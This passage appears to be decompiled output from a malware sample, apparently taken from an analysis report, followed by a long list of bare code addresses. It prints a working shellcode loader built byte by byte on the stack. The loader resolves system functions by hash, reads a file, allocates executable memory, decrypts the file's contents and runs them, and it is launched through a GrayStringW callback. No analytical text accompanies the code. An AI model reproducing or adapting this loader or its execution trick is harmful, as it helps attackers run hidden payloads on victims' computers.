                                                                    				_v530 = 0xe8;
                                                                    				_v529 = 0x96;
                                                                    				_v528 = 0xff;
                                                                    				_v527 = 0xff;
                                                                    				_v526 = 0xff;
                                                                    				_v525 = 0x59;
                                                                    				_v524 = 0x3b;
                                                                    				_v523 = 0x45;
                                                                    				_v522 = 0xc;
                                                                    				_v521 = 0x74;
                                                                    				_v520 = 0x12;
                                                                    				_v519 = 0x8b;
                                                                    				_v518 = 0x55;
                                                                    				_v517 = 0xfc;
                                                                    				_v516 = 0x46;
                                                                    				_v515 = 0x3b;
                                                                    				_v514 = 0x75;
                                                                    				_v513 = 8;
                                                                    				_v512 = 0x72;
                                                                    				_v511 = 0xe6;
                                                                    				_v510 = 0x33;
                                                                    				_v509 = 0xc0;
                                                                    				_v508 = 0x5f;
                                                                    				_v507 = 0x5e;
                                                                    				_v506 = 0x5b;
                                                                    				_v505 = 0x8b;
                                                                    				_v504 = 0xe5;
                                                                    				_v503 = 0x5d;
                                                                    				_v502 = 0xc3;
                                                                    				_v501 = 0x8b;
                                                                    				_v500 = 0x45;
                                                                    				_v499 = 0xf8;
                                                                    				_v498 = 0xf;
                                                                    				_v497 = 0xb7;
                                                                    				_v496 = 4;
                                                                    				_v495 = 0x70;
                                                                    				_v494 = 0x8b;
                                                                    				_v493 = 4;
                                                                    				_v492 = 0x83;
                                                                    				_v491 = 3;
                                                                    				_v490 = 0xc7;
                                                                    				_v489 = 0xeb;
                                                                    				_v488 = 0xeb;
                                                                    				_v487 = 0x55;
                                                                    				_v486 = 0x8b;
                                                                    				_v485 = 0xec;
                                                                    				_v484 = 0x81;
                                                                    				_v483 = 0xec;
                                                                    				_v482 = 0x24;
                                                                    				_v481 = 4;
                                                                    				_v480 = 0;
                                                                    				_v479 = 0;
                                                                    				_v478 = 0x53;
                                                                    				_v477 = 0x56;
                                                                    				_v476 = 0x57;
                                                                    				_v475 = 0x64;
                                                                    				_v474 = 0xa1;
                                                                    				_v473 = 0x30;
                                                                    				_v472 = 0;
                                                                    				_v471 = 0;
                                                                    				_v470 = 0;
                                                                    				_v469 = 0x8b;
                                                                    				_v468 = 0x40;
                                                                    				_v467 = 0xc;
                                                                    				_v466 = 0x8b;
                                                                    				_v465 = 0x40;
                                                                    				_v464 = 0xc;
                                                                    				_v463 = 0x8b;
                                                                    				_v462 = 0;
                                                                    				_v461 = 0x8b;
                                                                    				_v460 = 0;
                                                                    				_v459 = 0x8b;
                                                                    				_v458 = 0x40;
                                                                    				_v457 = 0x18;
                                                                    				_v456 = 0x8b;
                                                                    				_v455 = 0xf0;
                                                                    				_v454 = 0x33;
                                                                    				_v453 = 0xdb;
                                                                    				_v452 = 0x68;
                                                                    				_v451 = 0x41;
                                                                    				_v450 = 0xb9;
                                                                    				_v449 = 0x7e;
                                                                    				_v448 = 0x79;
                                                                    				_v447 = 0x56;
                                                                    				_v446 = 0x89;
                                                                    				_v445 = 0x5d;
                                                                    				_v444 = 0xec;
                                                                    				_v443 = 0xe8;
                                                                    				_v442 = 0x69;
                                                                    				_v441 = 0xff;
                                                                    				_v440 = 0xff;
                                                                    				_v439 = 0xff;
                                                                    				_v438 = 0x68;
                                                                    				_v437 = 0xd4;
                                                                    				_v436 = 0xfe;
                                                                    				_v435 = 0x5d;
                                                                    				_v434 = 0x67;
                                                                    				_v433 = 0x56;
                                                                    				_v432 = 0x8b;
                                                                    				_v431 = 0xf8;
                                                                    				_v430 = 0xe8;
                                                                    				_v429 = 0x5c;
                                                                    				_v428 = 0xff;
                                                                    				_v427 = 0xff;
                                                                    				_v426 = 0xff;
                                                                    				_v425 = 0x68;
                                                                    				_v424 = 0xb3;
                                                                    				_v423 = 0xef;
                                                                    				_v422 = 0xb6;
                                                                    				_v421 = 0xba;
                                                                    				_v420 = 0x56;
                                                                    				_v419 = 0x89;
                                                                    				_v418 = 0x45;
                                                                    				_v417 = 0xf8;
                                                                    				_v416 = 0xe8;
                                                                    				_v415 = 0x4e;
                                                                    				_v414 = 0xff;
                                                                    				_v413 = 0xff;
                                                                    				_v412 = 0xff;
                                                                    				_v411 = 0x68;
                                                                    				_v410 = 0x13;
                                                                    				_v409 = 0xe6;
                                                                    				_v408 = 0x9f;
                                                                    				_v407 = 0xfc;
                                                                    				_v406 = 0x56;
                                                                    				_v405 = 0x89;
                                                                    				_v404 = 0x45;
                                                                    				_v403 = 0xfc;
                                                                    				_v402 = 0xe8;
                                                                    				_v401 = 0x40;
                                                                    				_v400 = 0xff;
                                                                    				_v399 = 0xff;
                                                                    				_v398 = 0xff;
                                                                    				_v397 = 0x68;
                                                                    				_v396 = 0xd6;
                                                                    				_v395 = 0x7e;
                                                                    				_v394 = 0xeb;
                                                                    				_v393 = 0x3c;
                                                                    				_v392 = 0x56;
                                                                    				_v391 = 0x89;
                                                                    				_v390 = 0x45;
                                                                    				_v389 = 0xf4;
                                                                    				_v388 = 0xe8;
                                                                    				_v387 = 0x32;
                                                                    				_v386 = 0xff;
                                                                    				_v385 = 0xff;
                                                                    				_v384 = 0xff;
                                                                    				_v383 = 0x83;
                                                                    				_v382 = 0xc4;
                                                                    				_v381 = 0x28;
                                                                    				_v380 = 0x89;
                                                                    				_v379 = 0x45;
                                                                    				_v378 = 0xf0;
                                                                    				_v377 = 0x8d;
                                                                    				_v376 = 0x85;
                                                                    				_v375 = 0xdc;
                                                                    				_v374 = 0xfb;
                                                                    				_v373 = 0xff;
                                                                    				_v372 = 0xff;
                                                                    				_v371 = 0x68;
                                                                    				_v370 = 3;
                                                                    				_v369 = 1;
                                                                    				_v368 = 0;
                                                                    				_v367 = 0;
                                                                    				_v366 = 0x50;
                                                                    				_v365 = 0x53;
                                                                    				_v364 = 0xff;
                                                                    				_v363 = 0xd7;
                                                                    				_v362 = 0x85;
                                                                    				_v361 = 0xc0;
                                                                    				_v360 = 0xf;
                                                                    				_v359 = 0x84;
                                                                    				_v358 = 0x32;
                                                                    				_v357 = 1;
                                                                    				_v356 = 0;
                                                                    				_v355 = 0;
                                                                    				_v354 = 0x53;
                                                                    				_v353 = 0x68;
                                                                    				_v352 = 0x80;
                                                                    				_v351 = 0;
                                                                    				_v350 = 0;
                                                                    				_v349 = 0;
                                                                    				_v348 = 0x6a;
                                                                    				_v347 = 3;
                                                                    				_v346 = 0x53;
                                                                    				_v345 = 0x6a;
                                                                    				_v344 = 7;
                                                                    				_v343 = 0x68;
                                                                    				_v342 = 0;
                                                                    				_v341 = 0;
                                                                    				_v340 = 0;
                                                                    				_v339 = 0x80;
                                                                    				_v338 = 0x8d;
                                                                    				_v337 = 0x85;
                                                                    				_v336 = 0xdc;
                                                                    				_v335 = 0xfb;
                                                                    				_v334 = 0xff;
                                                                    				_v333 = 0xff;
                                                                    				_v332 = 0x50;
                                                                    				_v331 = 0xff;
                                                                    				_v330 = 0x55;
                                                                    				_v329 = 0xfc;
                                                                    				_v328 = 0x89;
                                                                    				_v327 = 0x45;
                                                                    				_v326 = 0xfc;
                                                                    				_v325 = 0x83;
                                                                    				_v324 = 0xf8;
                                                                    				_v323 = 0xff;
                                                                    				_v322 = 0xf;
                                                                    				_v321 = 0x84;
                                                                    				_v320 = 0xc;
                                                                    				_v319 = 1;
                                                                    				_v318 = 0;
                                                                    				_v317 = 0;
                                                                    				_v316 = 0x53;
                                                                    				_v315 = 0x50;
                                                                    				_v314 = 0xff;
                                                                    				_v313 = 0x55;
                                                                    				_v312 = 0xf4;
                                                                    				_v311 = 0x8b;
                                                                    				_v310 = 0xf8;
                                                                    				_v309 = 0x83;
                                                                    				_v308 = 0xff;
                                                                    				_v307 = 0xff;
                                                                    				_v306 = 0xf;
                                                                    				_v305 = 0x84;
                                                                    				_v304 = 0xfc;
                                                                    				_v303 = 0;
                                                                    				_v302 = 0;
                                                                    				_v301 = 0;
                                                                    				_v300 = 0x6a;
                                                                    				_v299 = 4;
                                                                    				_v298 = 0x68;
                                                                    				_v297 = 0;
                                                                    				_v296 = 0x30;
                                                                    				_v295 = 0;
                                                                    				_v294 = 0;
                                                                    				_v293 = 0x57;
                                                                    				_v292 = 0x53;
                                                                    				_v291 = 0xff;
                                                                    				_v290 = 0x55;
                                                                    				_v289 = 0xf8;
                                                                    				_v288 = 0x8b;
                                                                    				_v287 = 0xf0;
                                                                    				_v286 = 0x85;
                                                                    				_v285 = 0xf6;
                                                                    				_v284 = 0xf;
                                                                    				_v283 = 0x84;
                                                                    				_v282 = 0xe6;
                                                                    				_v281 = 0;
                                                                    				_v280 = 0;
                                                                    				_v279 = 0;
                                                                    				_v278 = 0x53;
                                                                    				_v277 = 0x8d;
                                                                    				_v276 = 0x45;
                                                                    				_v275 = 0xec;
                                                                    				_v274 = 0x50;
                                                                    				_v273 = 0x57;
                                                                    				_v272 = 0x56;
                                                                    				_v271 = 0xff;
                                                                    				_v270 = 0x75;
                                                                    				_v269 = 0xfc;
                                                                    				_v268 = 0xff;
                                                                    				_v267 = 0x55;
                                                                    				_v266 = 0xf0;
                                                                    				_v265 = 0x85;
                                                                    				_v264 = 0xc0;
                                                                    				_v263 = 0xf;
                                                                    				_v262 = 0x84;
                                                                    				_v261 = 0xd1;
                                                                    				_v260 = 0;
                                                                    				_v259 = 0;
                                                                    				_v258 = 0;
                                                                    				_v257 = 0x8b;
                                                                    				_v256 = 0x46;
                                                                    				_v255 = 0x3c;
                                                                    				_v254 = 3;
                                                                    				_v253 = 0xc6;
                                                                    				_v252 = 0xf;
                                                                    				_v251 = 0xb7;
                                                                    				_v250 = 0x48;
                                                                    				_v249 = 6;
                                                                    				_v248 = 0x8b;
                                                                    				_v247 = 0x50;
                                                                    				_v246 = 0x54;
                                                                    				_v245 = 0x89;
                                                                    				_v244 = 0x55;
                                                                    				_v243 = 0xfc;
                                                                    				_v242 = 0x85;
                                                                    				_v241 = 0xc9;
                                                                    				_v240 = 0x74;
                                                                    				_v239 = 0x19;
                                                                    				_v238 = 0xf;
                                                                    				_v237 = 0xb7;
                                                                    				_v236 = 0x50;
                                                                    				_v235 = 0x14;
                                                                    				_v234 = 0x83;
                                                                    				_v233 = 0xc2;
                                                                    				_v232 = 0x28;
                                                                    				_v231 = 3;
                                                                    				_v230 = 0xc2;
                                                                    				_v229 = 0x8b;
                                                                    				_v228 = 0x55;
                                                                    				_v227 = 0xfc;
                                                                    				_v226 = 3;
                                                                    				_v225 = 0x10;
                                                                    				_v224 = 0x8d;
                                                                    				_v223 = 0x40;
                                                                    				_v222 = 0x28;
                                                                    				_v221 = 0x83;
                                                                    				_v220 = 0xe9;
                                                                    				_v219 = 1;
                                                                    				_v218 = 0x75;
                                                                    				_v217 = 0xf6;
                                                                    				_v216 = 0x89;
                                                                    				_v215 = 0x55;
                                                                    				_v214 = 0xfc;
                                                                    				_v213 = 0x6a;
                                                                    				_v212 = 0x40;
                                                                    				_v211 = 0xb8;
                                                                    				_v210 = 0xda;
                                                                    				_v209 = 0x15;
                                                                    				_v208 = 0;
                                                                    				_v207 = 0;
                                                                    				_v206 = 0x2b;
                                                                    				_v205 = 0xfa;
                                                                    				_v204 = 0x68;
                                                                    				_v203 = 0;
                                                                    				_v202 = 0x30;
                                                                    				_v201 = 0;
                                                                    				_v200 = 0;
                                                                    				_v199 = 0x50;
                                                                    				_v198 = 0x53;
                                                                    				_v197 = 0x2b;
                                                                    				_v196 = 0xf8;
                                                                    				_v195 = 0xff;
                                                                    				_v194 = 0x55;
                                                                    				_v193 = 0xf8;
                                                                    				_v192 = 3;
                                                                    				_v191 = 0x75;
                                                                    				_v190 = 0xfc;
                                                                    				_v189 = 0x68;
                                                                    				_v188 = 0xda;
                                                                    				_v187 = 0x15;
                                                                    				_v186 = 0;
                                                                    				_v185 = 0;
                                                                    				_v184 = 0x56;
                                                                    				_v183 = 0x50;
                                                                    				_v182 = 0x89;
                                                                    				_v181 = 0x45;
                                                                    				_v180 = 0xf0;
                                                                    				_v179 = 0xe8;
                                                                    				_v178 = 0x85;
                                                                    				_v177 = 0;
                                                                    				_v176 = 0;
                                                                    				_v175 = 0;
                                                                    				_v174 = 0x83;
                                                                    				_v173 = 0xc4;
                                                                    				_v172 = 0xc;
                                                                    				_v171 = 0x6a;
                                                                    				_v170 = 0x40;
                                                                    				_v169 = 0x68;
                                                                    				_v168 = 0;
                                                                    				_v167 = 0x30;
                                                                    				_v166 = 0;
                                                                    				_v165 = 0;
                                                                    				_v164 = 0x57;
                                                                    				_v163 = 0x53;
                                                                    				_v162 = 0xff;
                                                                    				_v161 = 0x55;
                                                                    				_v160 = 0xf8;
                                                                    				_v159 = 0x57;
                                                                    				_v158 = 0x8d;
                                                                    				_v157 = 0x8e;
                                                                    				_v156 = 0xda;
                                                                    				_v155 = 0x15;
                                                                    				_v154 = 0;
                                                                    				_v153 = 0;
                                                                    				_v152 = 0x89;
                                                                    				_v151 = 0x45;
                                                                    				_v150 = 0xf4;
                                                                    				_v149 = 0x51;
                                                                    				_v148 = 0x50;
                                                                    				_v147 = 0xe8;
                                                                    				_v146 = 0x65;
                                                                    				_v145 = 0;
                                                                    				_v144 = 0;
                                                                    				_v143 = 0;
                                                                    				_v142 = 0x8b;
                                                                    				_v141 = 0x75;
                                                                    				_v140 = 0xf0;
                                                                    				_v139 = 0x83;
                                                                    				_v138 = 0xc4;
                                                                    				_v137 = 0xc;
                                                                    				_v136 = 0x8a;
                                                                    				_v135 = 0xc;
                                                                    				_v134 = 0x33;
                                                                    				_v133 = 0x8d;
                                                                    				_v132 = 0x43;
                                                                    				_v131 = 0xf6;
                                                                    				_v130 = 0x80;
                                                                    				_v129 = 0xf1;
                                                                    				_v128 = 0xee;
                                                                    				_v127 = 0xb2;
                                                                    				_v126 = 0x72;
                                                                    				_v125 = 0xc0;
                                                                    				_v124 = 0xc9;
                                                                    				_v123 = 2;
                                                                    				_v122 = 2;
                                                                    				_v121 = 0xc8;
                                                                    				_v120 = 0xb0;
                                                                    				_v119 = 0x70;
                                                                    				_v118 = 0x32;
                                                                    				_v117 = 0xcb;
                                                                    				_v116 = 0x2a;
                                                                    				_v115 = 0xd1;
                                                                    				_v114 = 0x80;
                                                                    				_v113 = 0xf2;
                                                                    				_v112 = 0x48;
                                                                    				_v111 = 0xf6;
                                                                    				_v110 = 0xda;
                                                                    				_v109 = 0x80;
                                                                    				_v108 = 0xf2;
                                                                    				_v107 = 0x61;
                                                                    				_v106 = 0x80;
                                                                    				_v105 = 0xea;
                                                                    				_v104 = 0x1b;
                                                                    				_v103 = 0xd0;
                                                                    				_v102 = 0xc2;
                                                                    				_v101 = 2;
                                                                    				_v100 = 0xd3;
                                                                    				_v99 = 0x80;
                                                                    				_v98 = 0xf2;
                                                                    				_v97 = 0x21;
                                                                    				_v96 = 0x2a;
                                                                    				_v95 = 0xd3;
                                                                    				_v94 = 0xf6;
                                                                    				_v93 = 0xd2;
                                                                    				_v92 = 0xc0;
                                                                    				_v91 = 0xca;
                                                                    				_v90 = 3;
                                                                    				_v89 = 0x80;
                                                                    				_v88 = 0xea;
                                                                    				_v87 = 0x3c;
                                                                    				_v86 = 0xd0;
                                                                    				_v85 = 0xc2;
                                                                    				_v84 = 0x2a;
                                                                    				_v83 = 0xc2;
                                                                    				_v82 = 0x32;
                                                                    				_v81 = 0xc3;
                                                                    				_v80 = 0x34;
                                                                    				_v79 = 0x90;
                                                                    				_v78 = 0xf6;
                                                                    				_v77 = 0xd0;
                                                                    				_v76 = 0xc0;
                                                                    				_v75 = 0xc8;
                                                                    				_v74 = 3;
                                                                    				_v73 = 0xf6;
                                                                    				_v72 = 0xd0;
                                                                    				_v71 = 0xc0;
                                                                    				_v70 = 0xc8;
                                                                    				_v69 = 3;
                                                                    				_v68 = 0x34;
                                                                    				_v67 = 0xf0;
                                                                    				_v66 = 0x88;
                                                                    				_v65 = 4;
                                                                    				_v64 = 0x33;
                                                                    				_v63 = 0x43;
                                                                    				_v62 = 0x81;
                                                                    				_v61 = 0xfb;
                                                                    				_v60 = 0xda;
                                                                    				_v59 = 0x15;
                                                                    				_v58 = 0;
                                                                    				_v57 = 0;
                                                                    				_v56 = 0x72;
                                                                    				_v55 = 0xae;
                                                                    				_v54 = 0xff;
                                                                    				_v53 = 0x75;
                                                                    				_v52 = 0xf4;
                                                                    				_v51 = 0xff;
                                                                    				_v50 = 0xd6;
                                                                    				_v49 = 0x59;
                                                                    				_v48 = 0x5f;
                                                                    				_v47 = 0x5e;
                                                                    				_v46 = 0x5b;
                                                                    				_v45 = 0x8b;
                                                                    				_v44 = 0xe5;
                                                                    				_v43 = 0x5d;
                                                                    				_v42 = 0xc3;
                                                                    				_v41 = 0x55;
                                                                    				_v40 = 0x8b;
                                                                    				_v39 = 0xec;
                                                                    				_v38 = 0x8b;
                                                                    				_v37 = 0x55;
                                                                    				_v36 = 0x10;
                                                                    				_v35 = 0x85;
                                                                    				_v34 = 0xd2;
                                                                    				_v33 = 0x74;
                                                                    				_v32 = 0x15;
                                                                    				_v31 = 0x8b;
                                                                    				_v30 = 0x4d;
                                                                    				_v29 = 8;
                                                                    				_v28 = 0x56;
                                                                    				_v27 = 0x8b;
                                                                    				_v26 = 0x75;
                                                                    				_v25 = 0xc;
                                                                    				_v24 = 0x2b;
                                                                    				_v23 = 0xf1;
                                                                    				_v22 = 0x8a;
                                                                    				_v21 = 4;
                                                                    				_v20 = 0xe;
                                                                    				_v19 = 0x88;
                                                                    				_v18 = 1;
                                                                    				_v17 = 0x41;
                                                                    				_v16 = 0x83;
                                                                    				_v15 = 0xea;
                                                                    				_v14 = 1;
                                                                    				_v13 = 0x75;
                                                                    				_v12 = 0xf5;
                                                                    				_v11 = 0x5e;
                                                                    				_v10 = 0x5d;
                                                                    				_v9 = 0xc3;
                                                                    				_v8 = 0;
                                                                    				_v7 = 0;
                                                                    				_v6 = 0;
                                                                    				_v5 = 0;
                                                                    				_t637 = GrayStringW(GetDC(0), 0,  &_v636,  &_v1636, 0, 0, 0, 0, 0); // executed
                                                                    				return _t637;
                                                                    			}





























































































































































































































































































































































































































































































































































































































































                                                                    0x00401009
                                                                    0x00401010
                                                                    0x00401017
                                                                    0x0040101e
                                                                    0x00401025
                                                                    0x0040102c
                                                                    0x00401033
                                                                    0x0040103a
                                                                    0x00401041
                                                                    0x00401048
                                                                    0x0040104f
                                                                    0x00401056
                                                                    0x0040105d
                                                                    0x00401064
                                                                    0x0040106b
                                                                    0x00401072
                                                                    0x00401079
                                                                    0x00401080
                                                                    0x00401087
                                                                    0x0040108e
                                                                    0x00401095
                                                                    0x0040109c
                                                                    0x004010a3
                                                                    0x004010aa
                                                                    0x004010b1
                                                                    0x004010b8
                                                                    0x004010bf
                                                                    0x004010c6
                                                                    0x004010cd
                                                                    0x004010d4
                                                                    0x004010db
                                                                    0x004010e2
                                                                    0x004010e9
                                                                    0x004010f0
                                                                    0x004010f7
                                                                    0x004010fe
                                                                    0x00401105
                                                                    0x0040110c
                                                                    0x00401113
                                                                    0x0040111a
                                                                    0x00401121
                                                                    0x00401128
                                                                    0x0040112f
                                                                    0x00401136
                                                                    0x0040113d
                                                                    0x00401144
                                                                    0x0040114b
                                                                    0x00401152
                                                                    0x00401159
                                                                    0x00401160
                                                                    0x00401167
                                                                    0x0040116e
                                                                    0x00401175
                                                                    0x0040117c
                                                                    0x00401183
                                                                    0x0040118a
                                                                    0x00401191
                                                                    0x00401198
                                                                    0x0040119f
                                                                    0x004011a6
                                                                    0x004011ad
                                                                    0x004011b4
                                                                    0x004011bb
                                                                    0x004011c2
                                                                    0x004011c9
                                                                    0x004011d0
                                                                    0x004011d7
                                                                    0x004011de
                                                                    0x004011e5
                                                                    0x004011ec
                                                                    0x004011f3
                                                                    0x004011fa
                                                                    0x00401201
                                                                    0x00401208
                                                                    0x0040120f
                                                                    0x00401216
                                                                    0x0040121d
                                                                    0x00401224
                                                                    0x0040122b
                                                                    0x00401232
                                                                    0x00401239
                                                                    0x00401240
                                                                    0x00401247
                                                                    0x0040124e
                                                                    0x00401255
                                                                    0x0040125c
                                                                    0x00401263
                                                                    0x0040126a
                                                                    0x00401271
                                                                    0x00401278
                                                                    0x0040127f
                                                                    0x00401286
                                                                    0x0040128d
                                                                    0x00401294
                                                                    0x0040129b
                                                                    0x004012a2
                                                                    0x004012a9
                                                                    0x004012b0
                                                                    0x004012b7
                                                                    0x004012be
                                                                    0x004012c5
                                                                    0x004012cc
                                                                    0x004012d3
                                                                    0x004012da
                                                                    0x004012e1
                                                                    0x004012e8
                                                                    0x004012ef
                                                                    0x004012f6
                                                                    0x004012fd
                                                                    0x00401304
                                                                    0x0040130b
                                                                    0x00401312
                                                                    0x00401319
                                                                    0x00401320
                                                                    0x00401327
                                                                    0x0040132e
                                                                    0x00401335
                                                                    0x0040133c
                                                                    0x00401343
                                                                    0x0040134a
                                                                    0x00401351
                                                                    0x00401358
                                                                    0x0040135f
                                                                    0x00401366
                                                                    0x0040136d
                                                                    0x00401374
                                                                    0x0040137b
                                                                    0x00401382
                                                                    0x00401389
                                                                    0x00401390
                                                                    0x00401397
                                                                    0x0040139e
                                                                    0x004013a5
                                                                    0x004013ac
                                                                    0x004013b3
                                                                    0x004013ba
                                                                    0x004013c1
                                                                    0x004013c8
                                                                    0x004013cf
                                                                    0x004013d6
                                                                    0x004013dd
                                                                    0x004013e4
                                                                    0x004013eb
                                                                    0x004013f2
                                                                    0x004013f9
                                                                    0x00401400
                                                                    0x00401407
                                                                    0x0040140e
                                                                    0x00401415
                                                                    0x0040141c
                                                                    0x00401423
                                                                    0x0040142a
                                                                    0x00401431
                                                                    0x00401438
                                                                    0x0040143f
                                                                    0x00401446
                                                                    0x0040144d
                                                                    0x00401454
                                                                    0x0040145b
                                                                    0x00401462
                                                                    0x00401469
                                                                    0x00401470
                                                                    0x00401477
                                                                    0x0040147e
                                                                    0x00401485
                                                                    0x0040148c
                                                                    0x00401493
                                                                    0x0040149a
                                                                    0x004014a1
                                                                    0x004014a8
                                                                    0x004014af
                                                                    0x004014b6
                                                                    0x004014bd
                                                                    0x004014c4
                                                                    0x004014cb
                                                                    0x004014d2
                                                                    0x004014d9
                                                                    0x004014e0
                                                                    0x004014e7
                                                                    0x004014ee
                                                                    0x004014f5
                                                                    0x004014fc
                                                                    0x00401503
                                                                    0x0040150a
                                                                    0x00401511
                                                                    0x00401518
                                                                    0x0040151f
                                                                    0x00401526
                                                                    0x0040152d
                                                                    0x00401534
                                                                    0x0040153b
                                                                    0x00401542
                                                                    0x00401549
                                                                    0x00401550
                                                                    0x00401557
                                                                    0x0040155e
                                                                    0x00401565
                                                                    0x0040156c
                                                                    0x00401573
                                                                    0x0040157a
                                                                    0x00401581
                                                                    0x00401588
                                                                    0x0040158f
                                                                    0x00401596
                                                                    0x0040159d
                                                                    0x004015a4
                                                                    0x004015ab
                                                                    0x004015b2
                                                                    0x004015b9
                                                                    0x004015c0
                                                                    0x004015c7
                                                                    0x004015ce
                                                                    0x004015d5
                                                                    0x004015dc
                                                                    0x004015e3
                                                                    0x004015ea
                                                                    0x004015f1
                                                                    0x004015f8
                                                                    0x004015ff
                                                                    0x00401606
                                                                    0x0040160d
                                                                    0x00401614
                                                                    0x0040161b
                                                                    0x00401622
                                                                    0x00401629
                                                                    0x00401630
                                                                    0x00401637
                                                                    0x0040163e
                                                                    0x00401645
                                                                    0x0040164c
                                                                    0x00401653
                                                                    0x0040165a
                                                                    0x00401661
                                                                    0x00401668
                                                                    0x0040166f
                                                                    0x00401676
                                                                    0x0040167d
                                                                    0x00401684
                                                                    0x0040168b
                                                                    0x00401692
                                                                    0x00401699
                                                                    0x004016a0
                                                                    0x004016a7
                                                                    0x004016ae
                                                                    0x004016b5
                                                                    0x004016bc
                                                                    0x004016c3
                                                                    0x004016ca
                                                                    0x004016d1
                                                                    0x004016d8
                                                                    0x004016df
                                                                    0x004016e6
                                                                    0x004016ed
                                                                    0x004016f4
                                                                    0x004016fb
                                                                    0x00401702
                                                                    0x00401709
                                                                    0x00401710
                                                                    0x00401717
                                                                    0x0040171e
                                                                    0x00401725
                                                                    0x0040172c
                                                                    0x00401733
                                                                    0x0040173a
                                                                    0x00401741
                                                                    0x00401748
                                                                    0x0040174f
                                                                    0x00401756
                                                                    0x0040175d
                                                                    0x00401764
                                                                    0x0040176b
                                                                    0x00401772
                                                                    0x00401779
                                                                    0x00401780
                                                                    0x00401787
                                                                    0x0040178e
                                                                    0x00401795
                                                                    0x0040179c
                                                                    0x004017a3
                                                                    0x004017aa
                                                                    0x004017b1
                                                                    0x004017b8
                                                                    0x004017bf
                                                                    0x004017c6
                                                                    0x004017cd
                                                                    0x004017d4
                                                                    0x004017db
                                                                    0x004017e2
                                                                    0x004017e9
                                                                    0x004017f0
                                                                    0x004017f7
                                                                    0x004017fe
                                                                    0x00401805
                                                                    0x0040180c
                                                                    0x00401813
                                                                    0x0040181a
                                                                    0x00401821
                                                                    0x00401828
                                                                    0x0040182f
                                                                    0x00401836
                                                                    0x0040183d
                                                                    0x00401844
                                                                    0x0040184b
                                                                    0x00401852
                                                                    0x00401859
                                                                    0x00401860
                                                                    0x00401867
                                                                    0x0040186e
                                                                    0x00401875
                                                                    0x0040187c
                                                                    0x00401883
                                                                    0x0040188a
                                                                    0x00401891
                                                                    0x00401898
                                                                    0x0040189f
                                                                    0x004018a6
                                                                    0x004018ad
                                                                    0x004018b4
                                                                    0x004018bb
                                                                    0x004018c2
                                                                    0x004018c9
                                                                    0x004018d0
                                                                    0x004018d7
                                                                    0x004018de
                                                                    0x004018e5
                                                                    0x004018ec
                                                                    0x004018f3
                                                                    0x004018fa
                                                                    0x00401901
                                                                    0x00401908
                                                                    0x0040190f
                                                                    0x00401916
                                                                    0x0040191d
                                                                    0x00401924
                                                                    0x0040192b
                                                                    0x00401932
                                                                    0x00401939
                                                                    0x00401940
                                                                    0x00401947
                                                                    0x0040194e
                                                                    0x00401955
                                                                    0x0040195c
                                                                    0x00401963
                                                                    0x0040196a
                                                                    0x00401971
                                                                    0x00401978
                                                                    0x0040197f
                                                                    0x00401986
                                                                    0x0040198d
                                                                    0x00401994
                                                                    0x0040199b
                                                                    0x004019a2
                                                                    0x004019a9
                                                                    0x004019b0
                                                                    0x004019b7
                                                                    0x004019be
                                                                    0x004019c5
                                                                    0x004019cc
                                                                    0x004019d3
                                                                    0x004019da
                                                                    0x004019e1
                                                                    0x004019e8
                                                                    0x004019ef
                                                                    0x004019f6
                                                                    0x004019fd
                                                                    0x00401a04
                                                                    0x00401a0b
                                                                    0x00401a12
                                                                    0x00401a19
                                                                    0x00401a20
                                                                    0x00401a27
                                                                    0x00401a2e
                                                                    0x00401a35
                                                                    0x00401a3c
                                                                    0x00401a43
                                                                    0x00401a4a
                                                                    0x00401a51
                                                                    0x00401a58
                                                                    0x00401a5f
                                                                    0x00401a66
                                                                    0x00401a6d
                                                                    0x00401a74
                                                                    0x00401a7b
                                                                    0x00401a82
                                                                    0x00401a89
                                                                    0x00401a90
                                                                    0x00401a97
                                                                    0x00401a9e
                                                                    0x00401aa5
                                                                    0x00401aac
                                                                    0x00401ab3
                                                                    0x00401aba
                                                                    0x00401ac1
                                                                    0x00401ac8
                                                                    0x00401acf
                                                                    0x00401ad6
                                                                    0x00401add
                                                                    0x00401ae4
                                                                    0x00401aeb
                                                                    0x00401af2
                                                                    0x00401af9
                                                                    0x00401b00
                                                                    0x00401b07
                                                                    0x00401b0e
                                                                    0x00401b15
                                                                    0x00401b1c
                                                                    0x00401b23
                                                                    0x00401b2a
                                                                    0x00401b31
                                                                    0x00401b38
                                                                    0x00401b3f
                                                                    0x00401b46
                                                                    0x00401b4d
                                                                    0x00401b54
                                                                    0x00401b5b
                                                                    0x00401b62
                                                                    0x00401b69
                                                                    0x00401b70
                                                                    0x00401b77
                                                                    0x00401b7e
                                                                    0x00401b85
                                                                    0x00401b8c
                                                                    0x00401b93
                                                                    0x00401b9a
                                                                    0x00401ba1
                                                                    0x00401ba8
                                                                    0x00401baf
                                                                    0x00401bb6
                                                                    0x00401bbd
                                                                    0x00401bc4
                                                                    0x00401bcb
                                                                    0x00401bd2
                                                                    0x00401bd9
                                                                    0x00401be0
                                                                    0x00401be7
                                                                    0x00401bee
                                                                    0x00401bf5
                                                                    0x00401bfc
                                                                    0x00401c03
                                                                    0x00401c0a
                                                                    0x00401c11
                                                                    0x00401c18
                                                                    0x00401c1f
                                                                    0x00401c26
                                                                    0x00401c2d
                                                                    0x00401c34
                                                                    0x00401c3b
                                                                    0x00401c42
                                                                    0x00401c49
                                                                    0x00401c50
                                                                    0x00401c57
                                                                    0x00401c5e
                                                                    0x00401c65
                                                                    0x00401c6c
                                                                    0x00401c73
                                                                    0x00401c7a
                                                                    0x00401c81
                                                                    0x00401c88
                                                                    0x00401c8f
                                                                    0x00401c96
                                                                    0x00401c9d
                                                                    0x00401ca4
                                                                    0x00401cab
                                                                    0x00401cb2
                                                                    0x00401cb9
                                                                    0x00401cc0
                                                                    0x00401cc7
                                                                    0x00401cce
                                                                    0x00401cd5
                                                                    0x00401cdc
                                                                    0x00401ce3
                                                                    0x00401cea
                                                                    0x00401cf1
                                                                    0x00401cf8
                                                                    0x00401cff
                                                                    0x00401d06
                                                                    0x00401d0d
                                                                    0x00401d14
                                                                    0x00401d1b
                                                                    0x00401d22
                                                                    0x00401d29
                                                                    0x00401d30
                                                                    0x00401d37
                                                                    0x00401d3e
                                                                    0x00401d45
                                                                    0x00401d4c
                                                                    0x00401d53
                                                                    0x00401d5a
                                                                    0x00401d61
                                                                    0x00401d68
                                                                    0x00401d6f
                                                                    0x00401d76
                                                                    0x00401d7d
                                                                    0x00401d84
                                                                    0x00401d8b
                                                                    0x00401d92
                                                                    0x00401d99
                                                                    0x00401da0
                                                                    0x00401da7
                                                                    0x00401dae
                                                                    0x00401db5
                                                                    0x00401dbc
